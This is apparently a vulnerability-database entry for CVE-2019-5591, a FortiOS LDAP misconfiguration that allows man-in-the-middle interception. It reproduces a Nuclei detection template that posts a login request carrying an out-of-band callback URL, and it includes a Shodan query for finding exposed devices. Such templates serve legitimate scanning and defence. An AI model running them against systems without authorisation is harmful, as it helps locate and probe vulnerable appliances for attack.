FortiOS - Insecure LDAP Configuration Detection

🗓️ 27 Jun 2026 03:01:36Reported by ProjectDiscoveryType

FortiGate LDAP is insecure due to missing ca-cert and identity check, risking credential exposure.

Reporter	Title	Published	Views	Family All 31
GithubExploit	Exploit for Missing Authentication for Critical Function in Fortinet Fortios	16 Oct 202522:18	–	githubexploit
ICS	Top Routinely Exploited Vulnerabilities	20 Aug 202112:00	–	ics
ICS	Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities	19 Nov 202112:00	–	ics
ICS	Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations	14 Sep 202212:00	–	ics
ATTACKERKB	CVE-2018-13379 Path Traversal in Fortinet FortiOS	4 Jun 201900:00	–	attackerkb
ATTACKERKB	CVE-2019-5591	14 Aug 202000:00	–	attackerkb
BDU FSTEC	The vulnerability of the FortiOS operating system, related to authentication errors, allows a perpetrator to gain unauthorized access to protected information.	17 Dec 201900:00	–	bdu_fstec
Circl	CVE-2019-5591	14 Aug 202020:55	–	circl
CISA KEV Catalog	Fortinet FortiOS Default Configuration Vulnerability	3 Nov 202100:00	–	cisa_kev
CISA	FBI-CISA Joint Advisory on Exploitation of Fortinet FortiOS Vulnerabilities	2 Apr 202100:00	–	cisa

Source	Link
github	www.github.com/ayewo/fortios-ldap-mitm-poc-CVE-2019-5591
fortiguard	www.fortiguard.com/psirt/FG-IR-19-037

id: CVE-2019-5591

info:
  name: FortiOS - Insecure LDAP Configuration Detection
  author: ayewo
  severity: medium
  description: |
    The FortiGate LDAP configuration was detected to be insecure due to missing ca-cert, secure LDAPS, or server-identity-check, potentially exposing LDAP communications to credential interception or man-in-the-middle attacks under specific network conditions.
  impact: |
    Unauthenticated attackers can intercept sensitive information by impersonating LDAP servers within the same subnet.
  remediation: |
    Configure LDAP server settings properly and disable default configurations; update to the latest firmware version.
  reference:
    - https://github.com/ayewo/fortios-ldap-mitm-poc-CVE-2019-5591
    - https://www.fortiguard.com/psirt/FG-IR-19-037
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-5591
    epss-score: 0.18566
    epss-percentile: 0.96894
    cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortigate
    shodan-query: 'cpe:"cpe:2.3:o:fortinet:fortios"'
  tags: cve,cve2019,fortinet,ldap,kev,vkev,oast

variables:
  username: "{{rand_text_alpha(10)}}"
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /logincheck HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain;charset=UTF-8

        ajax=1&username={{username}}&secretkey={{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'name="username"'
          - 'name="secretkey"'
        condition: and

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - contains(body_2, "0")
          - contains(body_2, "1")
          - contains(body_2, "2")
        condition: or

      - type: word
        part: body_2
        words:
          - "ajax=1&username="
        condition: or
        negative: true

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
# digest: 490a00463044022050c19ac01828adfd303371878e6ecdbc47c2115d758f3972ab3e9eda4399ff4a022055a3dd4688de9863a9d892a4e3db60f4612d589bbcb71b68b21e0d3f7c0fbc87:922c64590222798bb761d5b6d8e72950

01 Nov 2025 15:44Current

7High risk

Vulners AI Score7

CVSS 23.3

CVSS 3.16.5

EPSS0.18566

SSVC